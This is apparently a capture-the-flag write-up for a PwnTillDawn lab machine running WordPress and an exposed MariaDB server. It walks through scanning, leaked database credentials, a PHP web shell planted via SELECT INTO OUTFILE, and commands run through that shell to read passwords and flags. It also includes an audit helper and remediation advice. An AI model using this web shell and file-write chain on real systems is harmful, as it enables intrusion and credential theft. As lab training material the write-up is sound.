ptd-margheriti-server-private


As always, we start with an nmap scan.

E:\PENTEST\NMAP>nmap -A 10.150.150.145
Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-05 11:06 W. Europe Standard Time
Nmap scan report for 10.150.150.145
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 65:cc:32:50:bb:af:b4:8a:be:ff:b1:39:3c:dd:2c:e9 (RSA)
| 256 f9:db:6f:49:63:d7:db:dd:42:42:86:36:c5:31:b1:07 (ECDSA)
|_ 256 8e:74:a9:e3:fd:74:0c:c2:f7:14:85:81:a6:ba:fc:ce (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 4.9.12
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: e-corp – Just another WordPress site
3306/tcp open mysql MySQL 5.5.5-10.1.26-MariaDB-0+deb9u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.26-MariaDB-0+deb9u1
| Thread ID: 33
| Capabilities flags: 63487
| Some Capabilities: ODBCClient, IgnoreSigpipes, SupportsTransactions, DontAllowDatabaseTableColumn, FoundRows, LongColumnFlag, SupportsLoadDataLocal, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsCompression, LongPassword, Speaks41ProtocolOld, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: (TQy0!PQ&h[pA3{54D92
|_ Auth Plugin Name: 103
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.26
OS details: Linux 2.4.26 (Slackware 10.0.0)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 ...
2 31.00 ms 10.150.150.145

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.36 seconds

E:\PENTEST\NMAP>

Then we brute-force the web root for files with the .zip extension (dirb with the common wordlist).

┌─[user@parrot-virtual]─[~/ptd]
└──╼ $dirb http://10.150.150.145 -X .zip -w /usr/share/dirb/wordlists/common.txt

-----------------
DIRB v2.22 
By The Dark Raver
-----------------

START_TIME: Fri Feb 5 12:06:25 2021
URL_BASE: http://10.150.150.145/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages
EXTENSIONS_LIST: (.zip) | (.zip) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.150.150.145/ ----
+ http://10.150.150.145/backup.zip (CODE:200|SIZE:10187627) 

-----------------
END_TIME: Fri Feb 5 12:09:38 2021
DOWNLOADED: 4612 - FOUND: 1
┌─[user@parrot-virtual]─[~/ptd]

We download http://10.150.150.145/backup.zip. FLAG14 is in there = e804bb2ca0c3d89ae027de4d86246130d9e3252c,
and the wp-config.php inside this zip contains the database credentials:

/** MySQL database username */
define('DB_USER', 'wpmaster');

/** MySQL database password */
define('DB_PASSWORD', '-!UlTr4S3cUr3P455W0rd-!');

MySQL is open on 3306/tcp on 10.150.150.145, so we connect to it with DBeaver using these credentials.

In the tables we find FLAG32_a40987757b60acc87e80196c757f2a19c8acc3b5,
and for the WordPress user eadmin the password hash: $P$B2auwafsSB05anAeWeHLNnAlk2hZLg1

We try hashcat on it (mode 400, phpass, against rockyou):

E:\PENTEST\hashcat>hashcat64.exe -O -m 400 -a 0 -o cracked.txt target_hashes.txt rockyou.txt --force
hashcat (v5.1.0) starting...

=> nothing found

Next we write a web shell into the web root through MySQL with SELECT ... INTO OUTFILE (this works because the database account is allowed to write files on the server):

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/cmd.php"
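The write above only succeeds because the database account has the FILE privilege, secure_file_priv does not exclude the web root, and 3306/tcp is reachable from the network. The Python below is an added audit helper, not from the write-up, that flags that combination from the output of SHOW VARIABLES LIKE 'secure_file_priv' and SHOW GRANTS; the grant lines and the web root path are constructed sample input, not taken from the target.

```python
import re

# Constructed sample input (not from the target): SHOW GRANTS output for three accounts.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'wpmaster'@'%' IDENTIFIED BY PASSWORD '<redacted>'",
    "GRANT ALL PRIVILEGES ON `wordpress`.* TO 'wpapp'@'localhost'",
    "GRANT FILE ON *.* TO 'etl'@'10.0.0.5'",
]
WEB_ROOT = "/var/www/html"  # assumed document root, the path used by the INTO OUTFILE above

GRANT_RE = re.compile(r"^GRANT (.+?) ON (\S+) TO '([^']*)'@'([^']*)'")


def _under(path: str, base: str) -> bool:
    """True if path lies inside base; an empty base means unrestricted."""
    base = base.rstrip("/")
    return base == "" or path == base or path.startswith(base + "/")


def outfile_write_risk(secure_file_priv: str, grants: list, web_root: str = WEB_ROOT) -> list:
    """Findings for accounts able to drop files in web_root with SELECT ... INTO OUTFILE.

    secure_file_priv as shown by SHOW VARIABLES: 'NULL' disables all file export/import,
    '' allows any path the mysqld user can write, a directory restricts writes to it.
    """
    findings = []
    sfp = secure_file_priv.strip()
    if sfp.upper() == "NULL":
        return findings  # server-wide off switch: INTO OUTFILE is always refused
    for line in grants:
        m = GRANT_RE.match(line)
        if not m:
            continue
        privs, scope, user, host = m.groups()
        privset = {p.strip().upper() for p in privs.split(",")}
        # FILE is a global privilege: ALL PRIVILEGES implies it only at *.* scope
        has_file = "FILE" in privset or ("ALL PRIVILEGES" in privset and scope == "*.*")
        if not has_file:
            continue
        who = f"{user}@{host}"
        if _under(web_root, sfp):
            where = "any path" if sfp == "" else f"paths under {sfp}"
            findings.append(f"{who}: FILE privilege and secure_file_priv allows {where}, "
                            f"so {web_root} is writable via INTO OUTFILE")
        if host == "%":
            findings.append(f"{who}: FILE privilege usable from any host (3306/tcp is exposed)")
    return findings
```

Setting secure_file_priv to NULL (or a directory outside the web root), dropping FILE from application accounts, and binding MariaDB to localhost each close this path on their own.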


E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=ls
WordPress-Account.txt
backup.zip
c.php
cmd.php
conf
hallo.txt
hoi.txt
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php

E:\PENTEST>
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=cat%20WordPress-Account.txt
user: eAdmin
password: 9r*WNyK7GUJ($bwi8G

E:\PENTEST>

We log in to the WordPress site as user eadmin and find FLAG23 in a draft post:

FLAG23=8ea0d06e16bccc89922bf674d7a90297a5316fda (Draft)

Next we search the web root for flag files through the web shell:

find . -iname "FLAG*"

E:\PENTEST>curl  http://10.150.150.145/cmd.php?cmd=find%20.%20-iname%20%22FLAG*%22
./wp-content/uploads/FLAG22.txt

From http://10.150.150.145/wp-content/uploads/ we fetch FLAG22 = 723d1a71be3d744bf84d9683c8df84f0fd916977.

We repeat the search over the whole filesystem:

E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=find%20/%20-iname%20%22FLAG*%22
/home/webmaster/FLAG6.txt
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/ens33/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/var/www/html/wp-content/uploads/FLAG22.txt
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags

E:\PENTEST>
E:\PENTEST>curl http://10.150.150.145/cmd.php?cmd=cat%20/home/webmaster/FLAG6.txt%20/
6340427478524495dd30102486948aa7e01ae4d1

E:\PENTEST>

For reference, this is how and where the web shell was uploaded:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/cmd.php"



Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.

Author : Puckiestyle
